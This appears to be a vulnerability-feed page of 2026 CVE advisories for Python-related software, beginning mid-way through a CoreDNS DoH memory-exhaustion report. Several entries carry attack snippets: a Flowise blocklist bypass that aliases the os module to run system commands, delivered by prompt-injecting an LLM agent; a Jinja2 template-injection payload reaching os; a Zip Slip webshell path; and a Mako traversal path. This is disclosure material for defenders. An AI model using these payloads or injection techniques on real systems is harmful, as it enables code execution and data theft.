`net/textproto.(*Reader).readLineSlice` → `19,668.19 MB` * `net/textproto.(*Reader).ReadLine` → `3,738.84 MB` * `encoding/base64.(*Encoding).DecodeString` → `2,766.16 MB` Within the CoreDNS DoH GET path specifically: * `github.com/coredns/coredns/plugin/pkg/doh.RequestToMsg` → `2,775.67 MB` * `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` → `2,775.67 MB` * `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` → `2,773.67 MB` Heap delta (`inuse_space`) also showed live growth attributable to this path, including: * `encoding/base64.(*Encoding).DecodeString` → `7,629.75 kB` #### Memory observations Runtime memory monitoring showed a clear increase in peak resident usage during the attack: * baseline `VmHWM / VmRSS` before load was approximately `55,864 kB` * observed `VmHWM` during testing reached approximately `146,100 kB` So even though requests returned `400`, the server still experienced substantial transient memory growth and allocator / GC pressure before rejection. ### Impact A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to the HTTPS endpoint and force significant pre-rejection work. Impact includes: * elevated CPU consumption * large transient allocations * increased garbage-collection pressure * higher peak resident memory usage * degraded throughput and responsiveness * denial of service risk on memory-constrained or heavily loaded deployments This is especially relevant for internet-facing DoH deployments, where an attacker can repeatedly trigger the GET parsing path without authentication. The fact that the final HTTP status is `400 Bad Request` does not mitigate the issue, because the expensive processing has already occurred before the rejection is generated. ### Suggested remediation A robust fix should address both stages of the problem: 1. Apply an early bound on the DoH GET request target / raw query length before expensive query parsing. 2. Enforce an encoded-length and decoded-length limit for the `dns` parameter before calling `DecodeString()`. 3. Preserve equivalent size constraints across GET and POST paths. A minimal hardening direction would be: * reject oversized GET requests before `req.URL.Query()` on the DoH path * reject `dns` values whose encoded length exceeds the maximum valid DNS message encoding * reject any decoded payload larger than the supported DNS message size before unpacking

Suse OpenSSL Python Denial Of Service Red Hat
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.1%
CVE-2026-41391 npm MEDIUM PATCH GHSA This Month

OpenClaw before version 2026.3.31 allows local authenticated attackers to redirect Python package-index traffic by injecting malicious URLs through unsanitized PIP_INDEX_URL and UV_INDEX_URL environment variables, enabling interception or manipulation of package management operations. The vulnerability requires local access and authentication but can result in high integrity impact through compromised package delivery. No active exploitation has been publicly confirmed, but the attack surface is direct and the remediation is straightforward.

Python Authentication Bypass
NVD GitHub
CVSS 4.0
5.8
EPSS
0.0%
CVE-2026-41873 CRITICAL Monitor

HTTP request smuggling in Apache Pony Mail (Lua implementation) enables remote unauthenticated attackers to achieve complete admin account takeover with critical impact across confidentiality, integrity, and availability. This affects all versions of the retired Lua codebase - Apache has abandoned support with no patch planned, recommending migration to alternative solutions. CVSS 9.8 critical severity reflects trivial network-based exploitation requiring no authentication or user interaction.

Information Disclosure Python Request Smuggling
NVD VulDB
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-6357 PyPI MEDIUM PATCH This Month

pip prior to version 26.1 would run self-update check functionality after installing wheel files which required importing well-known Python modules names. These module imports were intentionally deferred to increase startup time of the pip CLI. The patch changes self-update functionality to run before wheels are installed to prevent newly-installed modules from being imported shortly after the installation of a wheel package. Users should still review package contents prior to installation.

Information Disclosure Python Suse Red Hat
NVD GitHub VulDB
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-6977 MEDIUM POC This Month

Improper authorization in Vanna AI's Legacy Flask API allows remote unauthenticated attackers to bypass authentication controls and gain unauthorized access. Affects Vanna versions up to 2.0.2. A publicly available proof-of-concept exploit has been disclosed on GitHub, though vendor has not responded to disclosure. CVSS 7.3 severity reflects network-accessible attack with low complexity requiring no privileges or user interaction, enabling confidentiality, integrity, and availability impacts.

Authentication Bypass Python
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-41263 Go MEDIUM PATCH GHSA This Month

Traefik's BasicAuth middleware contains a timing side-channel vulnerability that allows attackers to enumerate valid usernames through response-time analysis. A map key/value confusion in the constant-time comparison fallback causes the `notFoundSecret` variable to always resolve to an empty string, causing authentication checks against non-existent users to complete in microseconds (~0.48ms) instead of performing full bcrypt evaluation (~62ms), creating a 130x timing oracle. Attackers can distinguish existing users from non-existent ones by measuring HTTP response times, enabling account enumeration without credentials.

Oracle Information Disclosure Python Red Hat Suse
NVD GitHub
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-41425 PyPI MEDIUM PATCH This Month

Cross-site request forgery (CSRF) in Authlib's Starlette OAuth client cache feature (versions prior to 1.6.11) allows unauthenticated remote attackers to forge requests that manipulate cached OAuth state, potentially leading to session hijacking or token theft. The vulnerability requires user interaction (UI:R) and affects confidentiality and integrity. Vendor-released patch: version 1.6.11.

CSRF Python Suse Red Hat
NVD GitHub VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-35051 Go HIGH PATCH GHSA This Week

Authentication bypass in Traefik's ForwardAuth middleware allows remote attackers to spoof the X-Forwarded-Prefix header and gain unauthorized access to protected backend routes when deployed behind trusted upstream proxies. Despite trustForwardHeader=false configuration, Traefik fails to sanitize attacker-controlled X-Forwarded-Prefix values in authentication subrequests, enabling attackers to impersonate trusted path prefixes (e.g., /admin) and bypass authorization checks in the authentication service. The vulnerability affects Traefik v2.x and v3.x series and is confirmed patched in versions 2.11.43, 3.6.14, and 3.7.0-rc.2. No KEV listing or EPSS data available at time of analysis, but a detailed proof-of-concept with complete Docker reproduction environment is publicly available in the GitHub advisory, significantly lowering exploitation complexity for attackers.

Docker Nginx Authentication Bypass Python
NVD GitHub VulDB
CVSS 4.0
7.8
EPSS
0.0%
CVE-2026-41486 PyPI HIGH PATCH GHSA This Week

Remote code execution in Ray Data 2.49.0-2.54.0 allows attackers to execute arbitrary Python code by crafting malicious Parquet files containing Ray tensor extension types. When Ray Data reads these files, it deserializes untrusted metadata using cloudpickle.loads() without validation, triggering code execution during schema parsing before any data is read. The vulnerability requires only that a victim read a crafted Parquet file from any source (cloud storage, HuggingFace datasets, shared filesystems)-no cluster access or authentication needed. This reintroduces a vulnerability class previously fixed in May 2024, making it a regression introduced in July 2025 (PR #54831). Working proof-of-concept exists demonstrating exploitation via HuggingFace datasets following Ray's own documentation. EPSS data not available, not currently in CISA KEV.

Python Code Injection Deserialization RCE
NVD GitHub VulDB
CVSS 4.0
8.9
EPSS
0.1%
CVE-2026-41432 Go HIGH PATCH GHSA This Week

Attackers can forge Stripe webhook events to obtain unlimited API quota without payment in QuantumNous new-api (Go package github.com/QuantumNous/new-api). The vulnerability exploits an empty default webhook secret that allows HMAC signature forgery, missing payment status validation, and cross-gateway order fulfillment logic that permits completing orders created through any payment provider (Epay, Creem, Waffo) via fabricated Stripe callbacks. Virtually all deployments with any payment method enabled are vulnerable in default configuration. Fixed in version 0.12.10. No public exploit code identified at time of analysis, but the detailed advisory includes a proof-of-concept pseudocode demonstrating the attack chain. CVSS 7.1 (High) with low attack complexity and low privileges required indicates practical exploitation risk for deployed instances.

Google Nginx Python RCE
NVD GitHub VulDB
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-41328 Go CRITICAL PATCH GHSA Act Now

Pre-authentication NoSQL injection in Dgraph allows remote unauthenticated attackers to exfiltrate entire databases and modify schemas via crafted JSON mutation keys. The vulnerability exploits unsanitized language tag fields in the addQueryIfUnique function, enabling DQL query injection through specially crafted HTTP POST requests to port 8080. Attackers can extract all database contents including credentials, secrets, and AWS keys with two HTTP requests against default configurations where ACL is disabled. CVSS 9.1 (Critical) with network vector, no authentication required, and low attack complexity. No public exploit code confirmed outside the GitHub advisory, though a complete proof-of-concept with video demonstration exists in the advisory. EPSS data not available for this recent CVE.

Docker Authentication Bypass Denial Of Service Apple Python +1
NVD GitHub
CVSS 3.1
9.1
EPSS
0.1%
CVE-2026-41327 Go CRITICAL PATCH GHSA Act Now

Remote unauthenticated attackers can exfiltrate all data from Dgraph databases via DQL injection in the /mutate endpoint's cond parameter. Default configurations with ACL disabled allow single HTTP POST requests to bypass authentication and execute arbitrary read queries, returning complete database contents including credentials, PII, and secrets. The vulnerability exploits unsanitized string concatenation in buildUpsertQuery() where user-supplied cond values are written directly into DQL queries without escaping or validation. Proof-of-concept demonstrates extraction of AWS credentials, GCP service account keys, and user secrets in a single request. No public exploitation confirmed at time of analysis, but POC code publicly available via GitHub advisory. EPSS data not available; CVSS 9.1 indicates critical severity with network vector and no authentication required.

Docker Authentication Bypass Denial Of Service Apple Python +1
NVD GitHub
CVSS 3.1
9.1
EPSS
0.0%
CVE-2026-33078 HIGH PATCH This Week

SQL injection in Roxy-WI versions before 8.2.6.4 allows remote unauthenticated attackers to execute arbitrary SQL commands via the server_ip parameter in the haproxy_section_save function. The vulnerability stems from unsanitized URL path parameters being directly interpolated into SQL queries using Python string formatting. Proof-of-concept code exists (CVSS E:P), and the CVSS 4.0 score of 8.9 with network vector (AV:N), low complexity (AC:L), and no authentication (PR:N) indicates a critical, easily exploitable vulnerability. Vendor-released patch available in version 8.2.6.4.

Nginx SQLi Python Apache
NVD GitHub
CVSS 4.0
8.9
EPSS
0.0%
CVE-2026-41265 npm CRITICAL PATCH GHSA Act Now

Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the specific flaw exists within the run method of the Airtable_Agents class. The issue results from the lack of proper sandboxing when evaluating an LLM generated python script. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the Airtable Agent node may convince an LLM to respond with a malicious python script that executes attacker controlled commands on the flowise server. This vulnerability is fixed in 3.1.0.

Python Command Injection
NVD GitHub VulDB
CVSS 4.0
9.2
EPSS
0.1%
CVE-2026-41205 PyPI HIGH PATCH GHSA This Week

Mako is a template library written in Python. Prior to 1.3.11, TemplateLookup.get_template() is vulnerable to path traversal when a URI starts with // (e.g., //../../../secret.txt). The root cause is an inconsistency between two slash-stripping implementations. Any file readable by the process can be returned as rendered template content when an application passes untrusted input directly to TemplateLookup.get_template(). This vulnerability is fixed in 1.3.11.

Python Path Traversal
NVD GitHub VulDB
CVSS 4.0
7.7
EPSS
0.0%
CVE-2026-41138 npm HIGH PATCH GHSA This Week

Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, there is a remote code execution vulnerability in AirtableAgent.ts caused by lack of input verification when using Pandas. The user’s input is directly applied to the question parameter within the prompt template and it is reflected to the Python code without any sanitization. This vulnerability is fixed in 3.1.0.

Python Code Injection RCE
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.4%
CVE-2025-62373 PyPI CRITICAL PATCH GHSA Act Now

Pipecat is an open-source Python framework for building real-time voice and multimodal conversational agents. Versions 0.0.41 through 0.0.93 have a vulnerability in `LivekitFrameSerializer` - an optional, non-default, undocumented frame serializer class (now deprecated) intended for LiveKit integration. The class's `deserialize()` method uses Python's `pickle.loads()` on data received from WebSocket clients without any validation or sanitization. This means that a malicious WebSocket client can send a crafted pickle payload to execute arbitrary code on the Pipecat server. The vulnerable code resides in `src/pipecat/serializers/livekit.py` (around line 73), where untrusted WebSocket message data is passed directly into `pickle.loads()` for deserialization. If a Pipecat server is configured to use LivekitFrameSerializer and is listening on an external interface (e.g. 0.0.0.0), an attacker on the network (or the internet, if the service is exposed) could achieve remote code execution (RCE) on the server by sending a malicious pickle payload. Version 0.0.94 contains a fix. Users of Pipecat should avoid or replace unsafe deserialization and improve network security configuration. The best mitigation is to stop using the vulnerable LivekitFrameSerializer altogether. Those who require LiveKit functionality should upgrade to the latest Pipecat version and switch to the recommended `LiveKitTransport` or another secure method provided by the framework. Additionally, always follow secure coding practices: never trust client-supplied data, and avoid Python pickle (or similar unsafe deserialization) in network-facing components.

Python Deserialization RCE
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.3%
CVE-2026-41206 PyPI MEDIUM PATCH This Month

PySpector versions prior to 0.1.8 allow arbitrary code execution within the PySpector process when a malicious plugin is supplied and executed. The plugin security validator uses incomplete AST-based static analysis that fails to block dangerous Python constructs, permitting attackers with write access to plugin files to bypass the blocklist and achieve remote code execution. The vulnerability is fixed in version 0.1.8.

Python RCE
NVD GitHub VulDB
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-41182 LIB MEDIUM PATCH This Month

LangSmith Client SDKs in JavaScript (prior to 0.5.19) and Python (prior to 0.7.31) fail to apply output redaction controls to streaming token events, allowing sensitive LLM-generated content to leak into LangSmith platform storage despite hideOutputs/hide_outputs being enabled. Unauthenticated remote attackers can intercept or access unredacted streamed tokens if they gain visibility into run events, bypassing the intended confidentiality controls.

Information Disclosure Python
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-41314 PyPI MEDIUM PATCH This Month

Denial of service via memory exhaustion in pypdf prior to 6.10.2 allows local attackers with user interaction to crash applications processing crafted PDF files containing FlateDecode-compressed images with inflated size values. The vulnerability exhausts available RAM during decompression, affecting any system using vulnerable pypdf versions to parse untrusted PDF documents.

Information Disclosure Python Red Hat Suse
NVD GitHub VulDB
CVSS 4.0
4.8
EPSS
0.0%
CVE-2026-41313 PyPI MEDIUM PATCH This Month

Denial of service via algorithmic complexity in pypdf versions prior to 6.10.2 allows local attackers to cause long runtimes by crafting a PDF with an excessively large trailer /Size value when loaded in incremental mode. The vulnerability requires user interaction to load the malicious PDF and results in availability degradation rather than data compromise. Patch version 6.10.2 is available from the vendor.

Information Disclosure Python Red Hat Suse
NVD GitHub
CVSS 4.0
4.8
EPSS
0.0%
CVE-2026-41312 PyPI MEDIUM PATCH This Month

Memory exhaustion in pypdf prior to 6.10.2 allows local attackers to craft malicious PDF files that exhaust system RAM when processed. The vulnerability requires user interaction to open a specially crafted PDF containing a /FlateDecode stream with a /Predictor value other than 1 and large predictor parameters. Vendor-released patch available in version 6.10.2.

Information Disclosure Python Red Hat Suse
NVD GitHub VulDB
CVSS 4.0
4.8
EPSS
0.0%
CVE-2026-41168 PyPI MEDIUM PATCH This Month

Denial of service in pypdf prior to version 6.10.1 allows remote attackers to craft malicious PDF files with oversized cross-reference stream `/Size` values or object stream `/N` values, causing excessive processing time and long runtimes. No authentication is required; the vulnerability is triggered by parsing a specially crafted PDF file. Patch version 6.10.1 is available from the vendor.

Information Disclosure Python Red Hat Suse
NVD GitHub VulDB
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-41203 PHP CRITICAL PATCH GHSA Act Now

Remote code execution in ci4ms content management system allows authenticated backend users with theme creation permissions to write arbitrary PHP files via Zip Slip path traversal. A working proof-of-concept demonstrates uploading a malicious theme archive containing path-traversal entries (../../public/shell.php) that bypass extraction directory boundaries, placing executable code under the web root. Vendor-released patch available in version 0.31.5.0. No CISA KEV listing or EPSS data available, but publicly disclosed PoC significantly lowers exploitation barrier for attackers with valid credentials.

RCE PHP Python Path Traversal
NVD GitHub
CVSS 4.0
9.4
EPSS
0.4%
CVE-2026-41202 PHP CRITICAL PATCH GHSA Act Now

Remote code execution in ci4ms (CodeIgniter 4 Management System) versions prior to 0.31.5.0 allows authenticated backend users with backup creation permissions to write PHP webshells to the public web root via Zip Slip path traversal during backup restoration. The vulnerability is confirmed actively exploited (CISA KEV) with publicly available exploit code exists. CVSS 9.4 (Critical) aligns with the real-world risk, as exploitation requires only low-privilege authentication and the affected route is exempt from CSRF protection, enabling drive-by attacks against logged-in administrators. Vendor-released patch version 0.31.5.0 addresses the flaw by implementing path validation during ZIP extraction.

RCE PHP Python Path Traversal
NVD GitHub
CVSS 4.0
9.4
EPSS
0.4%
CVE-2026-41140 PyPI LOW PATCH GHSA Monitor

Path traversal vulnerability in Poetry's tar extraction function allows arbitrary file writes when processing untrusted source distributions on Python 3.10.0-3.10.12 and 3.11.0-3.11.4, where the tarfile.data_filter safety mechanism is absent or broken. The vulnerability is triggered during dependency resolution (poetry add --lock) or installation before the build backend executes, enabling attackers to write files outside the intended extraction directory via crafted tar member paths, symlinks, or hardlinks in malicious sdists.

Ubuntu RCE Python Path Traversal Debian
NVD GitHub VulDB
CVSS 4.0
0.6
EPSS
0.1%
CVE-2026-6859 PyPI HIGH GHSA This Week

Remote code execution in InstructLab affects Red Hat Enterprise Linux AI 3 when users download or train models from HuggingFace Hub. The linux_train.py script hardcodes trust_remote_code=True, allowing attackers to execute arbitrary Python code by hosting malicious models on HuggingFace and convincing users to run ilab train, download, or generate commands. This configuration weakness enables complete system compromise through social engineering attacks. CVSS 8.8 with network vector but requires user interaction, reducing automatic exploitation risk. No active exploitation (CISA KEV) or public POC identified at time of analysis.

RCE Python Red Hat Enterprise Linux Ai Rhel Ai 3
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-41133 PyPI HIGH GHSA This Week

Session fixation in pyLoad 0.5.0b3.dev97 and earlier allows authenticated users to retain revoked administrative privileges until logout. After an administrator demotes a user's role or revokes permissions, the affected user's active session continues to operate with the old cached privileges, enabling unauthorized administrative actions. Publicly available exploit code exists via GitHub commit e95804fb0d06cbb07d2ba380fc494d9ff89b68c1. With CVSS 8.8 (High) but requiring low-privilege authentication (PR:L), this represents an elevation-of-privilege vector in multi-user pyLoad deployments where role changes are expected to take immediate effect.

Information Disclosure Python
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-41264 npm CRITICAL POC PATCH GHSA Act Now

## Abstract Trend Micro's Zero Day Initiative has identified a vulnerability affecting FlowiseAI Flowise. ## Vulnerability Details - **Version tested:** 3.0.13 - **Installer file:** https://github.com/FlowiseAI/Flowise - **Platform tested:** Ubuntu 25.10 ## Analysis This vulnerability allows remote attackers to execute arbitrary code on affected installations of FlowiseAI Flowise. Authentication is not required to exploit this vulnerability. The specific flaw exists within the `run` method of the `CSV_Agents` class. The issue results from the lack of proper sandboxing when evaluating an LLM-generated Python script. An attacker can leverage this vulnerability to execute code in the context of the user running the server. ### Product Information FlowiseAI Flowise version 3.0.13 - https://github.com/FlowiseAI/Flowise ### Setup Instructions ```bash npm install -g flowise@3.0.13 npx flowise start ``` ### Root Cause Analysis FlowiseAI Flowise is an open source low-code tool for developers to build customized large language model (LLM) applications and AI agents. It supports integration with various LLMs, data sources, and tools in order to facilitate rapid development and deployment of AI solutions. Flowise offers a web interface with a drag-and-drop editor, as well as an API, through an Express web server accessible over HTTP on port 3000/TCP. One such feature of Flowise is the ability to create chatflows. Chatflows use a drag-and-drop editor that allows a developer to place nodes which control how an interaction with an LLM will occur. One such node is the CSV Agent node that represents an Agent used to answer queries on a provided CSV file. When a user makes a query against a chatflow using the CSV Agent node, the `run` method of the `CSV_Agents` class is called. This method first reads the contents of the CSV file passed to the node and converts it to a base64 string. It then sets up a pyodide environment and creates a Python script to be executed in this environment. This Python script uses pandas to extract the column names and their types from the provided CSV file. The method then creates a system prompt for an LLM using this data as follows: ``` You are working with a pandas dataframe in Python. The name of the dataframe is df. The columns and data types of a dataframe are given below as a Python dictionary with keys showing column names and values showing the data types. {dict} I will ask question, and you will output the Python code using pandas dataframe to answer my question. Do not provide any explanations. Do not respond with anything except the output of the code. Security: Output ONLY pandas/numpy operations on the dataframe (df). Do not use import, exec, eval, open, os, subprocess, or any other system or file operations. The code will be validated and rejected if it contains such constructs. Question: {question} Output Code: ``` Where `{dict}` is the extracted column names and `{question}` is the initial prompt provided by the user. This system prompt is sent to an LLM in order for it to generate a Python script based on the user's prompt, and the LLM-generated response is stored in a variable named `pythonCode`. The method then evaluates the `pythonCode` variable in a pyodide environment. While the LLM-generated Python script is evaluated in a non-sandboxed environment, there is a list of forbidden patterns that are checked before the script is executed on the server. The function `validatePythonCodeForDataFrame()` enumerates through a list named `FORBIDDEN_PATTERNS`, which contains pairs of regex patterns and reasons. Each regex pattern is run against the Python script, and if the pattern is found in the script, the script is invalidated and is not run, responding to the request with a reason for rejection. The input validation can be bypassed, which can still lead to running arbitrary OS commands on the server. An example of this is the pattern `/\bimport\s+(?!pandas|numpy\b)/g`, which intends to search for lines of code that import a module other than pandas or numpy. This can be bypassed by importing along with pandas or numpy. For example, consider the following lines of code: ```python import pandas as np, os as pandas pandas.system("xcalc") ``` Here, pandas is imported, but so is the `os` module, with `pandas` as its alias. OS commands can then be invoked with `pandas.system()`. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the CSV Agent node may convince an LLM to respond with a malicious Python script that executes attacker-controlled commands on the Flowise server. It is also possible for an authenticated attacker to exploit this vulnerability by specifying an attacker-controlled server in a chatflow. This server would respond to prompts with an attacker-controlled Python script instead of an LLM-generated response, which would then be evaluated on the server. ### Relevant Source Code #### `packages/components/nodes/agents/CSVAgent/core.ts` ```ts import type { PyodideInterface } from 'pyodide' import * as path from 'path' import { getUserHome } from '../../../src/utils' let pyodideInstance: PyodideInterface | undefined export async function LoadPyodide(): Promise<PyodideInterface> { if (pyodideInstance === undefined) { const { loadPyodide } = await import('pyodide') const obj: any = { packageCacheDir: path.join(getUserHome(), '.flowise', 'pyodideCacheDir') } pyodideInstance = await loadPyodide(obj) await pyodideInstance.loadPackage(['pandas', 'numpy']) } return pyodideInstance } export const systemPrompt = `You are working with a pandas dataframe in Python. The name of the dataframe is df. The columns and data types of a dataframe are given below as a Python`*

RCE Ubuntu Python Node.js
NVD GitHub VulDB
CVSS 4.0
9.2
EPSS
0.1%
CVE-2026-6550 PyPI MEDIUM PATCH GHSA This Month

Cryptographic algorithm downgrade in AWS Encryption SDK for Python's caching layer allows authenticated local attackers to bypass key commitment policy enforcement through a shared key cache, enabling decryption of single ciphertext to multiple different plaintexts. Affected versions include Python 2 up to 2.5.1, Python 3 up to 3.3.0, and Python 4 up to 4.0.4. AWS has released vendor patches (versions 3.3.1, 4.0.5, and later) to remediate the vulnerability, which requires local access and authenticated credentials but has no known public exploit.

Authentication Bypass Python
NVD GitHub VulDB
CVSS 4.0
5.7
EPSS
0.0%
CVE-2026-28684 PyPI MEDIUM PATCH GHSA This Month

Local privilege escalation in python-dotenv before version 1.2.2 allows authenticated users to overwrite arbitrary files via symlink following in the set_key() and unset_key() functions when a cross-device rename fallback is triggered. An attacker with local access and the ability to write to the filesystem can create malicious symlinks that python-dotenv will follow during .env file rewriting, leading to unintended file modification or deletion. The vulnerability requires user interaction (the application must call set_key() or unset_key()) but affects any system using vulnerable versions of the library. No public exploit code or active exploitation has been reported at time of analysis.

Information Disclosure Python Red Hat Suse
NVD GitHub VulDB
CVSS 3.1
6.6
EPSS
0.0%
CVE-2026-40602 PyPI MEDIUM PATCH GHSA This Month

### Impact Up to 1.0.0 of `home-assitant-cli` (or `hass-cli` for short) an unrestricted environment was used to handle Jninja2 templates instead of a sandboxed one. The user-supplied input within Jinja2 templates was rendered locally with no restrictions. This gave users access to Python's internals and extended the scope of templating beyond the intended usage. E. g., it was possible to render a template with `hass-cli template bad-template.j2 --local` that contained entries like ````j2 {%- set b = environ.__globals__['__builtins__'] -%} {%- set os = b['__import__']('os') -%} {%- set bio = b['__import__']('builtins') -%} ... ```` or other malicious Jinja2 expressions. This can lead to arbitrary code execution on the local machine. In a two step process an adversary could trick/convince an user to download third-party templates which contain harmful code (e. g., perform data manipulation or establish a remote shell) then to render those templates unchecked/reviewed/verified with `--local`. The issue only affect the local machine and not a remote Home Assistant instance. It also requires user interventions. ### Patches 1.0.0 uses `ImmutableSandboxedEnvironment` and restricts the usage of environment variables. ### Workarounds Evaluate the Jninja2 templates manually or tool-based before rendering with `hass-cli`.

Code Injection Python RCE
NVD GitHub
CVSS 3.1
5.6
EPSS
0.0%
CVE-2026-40353 PyPI MEDIUM GHSA This Month

Stored cross-site scripting (XSS) in wger fitness application allows authenticated users to inject malicious JavaScript via unescaped license attribution fields in ingredient and image models, which executes when any visitor views the affected page. The vulnerability persists in the database and can be exploited to steal session cookies, perform unauthorized actions as other users, or conduct phishing attacks. Affected versions allow low-privilege authenticated users (any non-temporary account) to create ingredients with JavaScript payloads in the `license_author` field, which bypasses all input sanitization and is rendered with Django's `|safe` filter, disabling auto-escaping.

XSS Python
NVD GitHub
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-40474 PyPI HIGH GHSA This Week

Authenticated low-privileged users in wger can modify installation-wide gym configuration via /config/gym-config/edit due to missing permission enforcement, enabling vertical privilege escalation. The GymConfigUpdateView declares 'config.change_gymconfig' permission but inherits WgerFormMixin instead of WgerPermissionMixin, causing the permission check to never execute. Exploiting this allows attackers to manipulate default gym assignments affecting all users, with GymConfig.save() automatically reassigning user profiles and creating gym configurations tenant-wide. CVSS 7.6 (High) with network attack vector, low complexity, and low privileges required. No active exploitation (KEV) or public POC identified at time of analysis, though GitHub advisory provides detailed reproduction steps.

Authentication Bypass Docker Python Privilege Escalation
NVD GitHub
CVSS 3.1
7.6
EPSS
0.0%
CVE-2026-40594 PyPI MEDIUM PATCH GHSA This Month

Race condition in pyLoad's Flask session cookie handler allows unauthenticated attackers to manipulate the SESSION_COOKIE_SECURE flag globally across all concurrent requests by spoofing the X-Forwarded-Proto header. On deployments behind a TLS-terminating proxy, this enables session cookie downgrade attacks resulting in plaintext cookie transmission; on default plain HTTP deployments, it causes session denial of service by forcing the Secure flag and breaking all concurrent user sessions. The vulnerability requires no authentication and exploits a multi-threaded race window in the Cheroot WSGI server (request_queue_size=512) combined with missing proxy origin validation (acknowledged TODO in code).

Denial Of Service Kubernetes Python
NVD GitHub
CVSS 3.1
4.8
EPSS
0.0%
CVE-2026-40947 LOW PATCH Monitor

Untrusted DLL search path vulnerability in Yubico libfido2 before 1.17.0, python-fido2 before 2.2.0, and yubikey-manager before 5.9.1 allows local attackers to achieve privilege escalation or code execution by placing a malicious DLL in a directory searched before the legitimate library location. The vulnerability requires local access and high complexity conditions but affects three widely-used FIDO2 authentication libraries; no public exploit code identified at time of analysis.

Information Disclosure Python
NVD
CVSS 3.1
2.9
EPSS
0.0%
CVE-2026-40316 HIGH This Week

OWASP BLT is a QA testing and vulnerability disclosure platform that encompasses websites, apps, git repositories, and more. Versions prior to 2.1.1 contain an RCE vulnerability in the .github/workflows/regenerate-migrations.yml workflow. The workflow uses the pull_request_target trigger to run with full GITHUB_TOKEN write permissions, copies attacker-controlled files from untrusted pull requests into the trusted runner workspace via git show, and then executes python manage.py makemigrations, which imports Django model modules including attacker-controlled website/models.py at runtime. Any module-level Python code in the attacker's models.py is executed during import, enabling arbitrary code execution in the privileged CI environment with access to GITHUB_TOKEN and repository secrets. The attack is triggerable by any external contributor who can open a pull request, provided a maintainer applies the regenerate-migrations label, potentially leading to secret exfiltration, repository compromise, and supply chain attacks. A patch for this issue is expected to be released in version 2.1.1.

Code Injection Python RCE
NVD GitHub
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-40320 PyPI MEDIUM PATCH GHSA This Month

Remote code execution in giskard-checks through server-side template injection (SSTI) in the ConformityCheck class allows arbitrary Python code execution when the rule parameter is processed via unsandboxed Jinja2 template rendering. Affected versions prior to 1.0.2b1 silently interpret rule strings as Jinja2 templates, enabling attackers with write access to check definitions or configuration files to inject malicious template expressions that execute during test suite execution. Exploitation requires local file write access and subsequent developer execution of the test suite, but the implicit template evaluation increases risk when untrusted check definitions are integrated from shared projects or external sources.

RCE Ssti Python
NVD GitHub VulDB
CVSS 4.0
5.4
EPSS
0.0%
CVE-2026-40319 PyPI LOW PATCH GHSA Monitor

Denial of service in giskard-checks RegexMatching check via unguarded regex pattern matching allows local attackers with write access to check definitions to trigger catastrophic backtracking in Python's re.search() function, causing process hangs and disrupting CI/CD pipelines or automated test execution.

Denial Of Service Python
NVD GitHub
CVSS 4.0
1.0
EPSS
0.0%
CVE-2026-40683 PyPI HIGH PATCH GHSA This Week

OpenStack Keystone's LDAP identity backend grants authentication access to disabled user accounts due to improper string-to-boolean conversion logic. Versions 8.0.0 through 28.0.0 fail to convert LDAP-disabled status into boolean values when user_enabled_invert is False (default), causing disabled accounts to authenticate as enabled. This affects all LDAP-backed Keystone deployments without specific configuration overrides. CVSS 7.7 with changed scope (S:C) indicates potential cross-tenant privilege issues. EPSS data not available; no public exploit identified at time of analysis, though the logic flaw is straightforward to trigger with valid low-privilege credentials.

Information Disclosure Memory Corruption Python Red Hat
NVD VulDB
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-5713 MEDIUM PATCH This Month

Memory corruption in Python's asyncio introspection and profiling.sampling modules (3.14-3.15) allows a local attacker with high privileges to read and write arbitrary memory in a connected privileged Python process via remote debugging. Exploitation requires persistent, repeated connections and high tolerance for crashes due to ASLR; no public exploit code has been identified. SSVC framework rates technical impact as total, but exploitation remains none-indicating low real-world priority despite severe capability impact.

Buffer Overflow Stack Overflow Python
NVD GitHub VulDB
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-40288 PyPI CRITICAL PATCH GHSA Act Now

Arbitrary command and code execution in PraisonAI's workflow engine (versions <4.5.139) and praisonaiagents (<1.5.140) allows remote unauthenticated attackers to execute shell commands and Python code through malicious YAML workflow files. The vulnerability stems from unsafe processing of 'run:', 'script:', and 'python:' directives in job-type workflows without validation or sandboxing. With a critical CVSS score of 9.8 and network-accessible attack vector requiring no privileges or user interac

RCE Command Injection Python
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-40287 PyPI HIGH PATCH GHSA This Week

Arbitrary Python code execution in PraisonAI ≤4.5.138 occurs when malicious tools.py files are automatically imported from the current working directory without validation. Attackers placing a crafted tools.py in shared projects, cloned repositories, or writable workspaces achieve immediate code execution with full process privileges upon PraisonAI startup. EPSS data not available, but the local attack vector (AV:L) requiring no privileges (PR:N) or user interaction (UI:N) enables exploitation through supply chain and workspace poisoning attacks. No public exploit identified at time of analysis, though the vulnerability is trivial to exploit given the straightforward code injection mechanism.

Code Injection RCE Python
NVD GitHub
CVSS 3.1
8.4
EPSS
0.0%
CVE-2026-39419 LOW PATCH Monitor

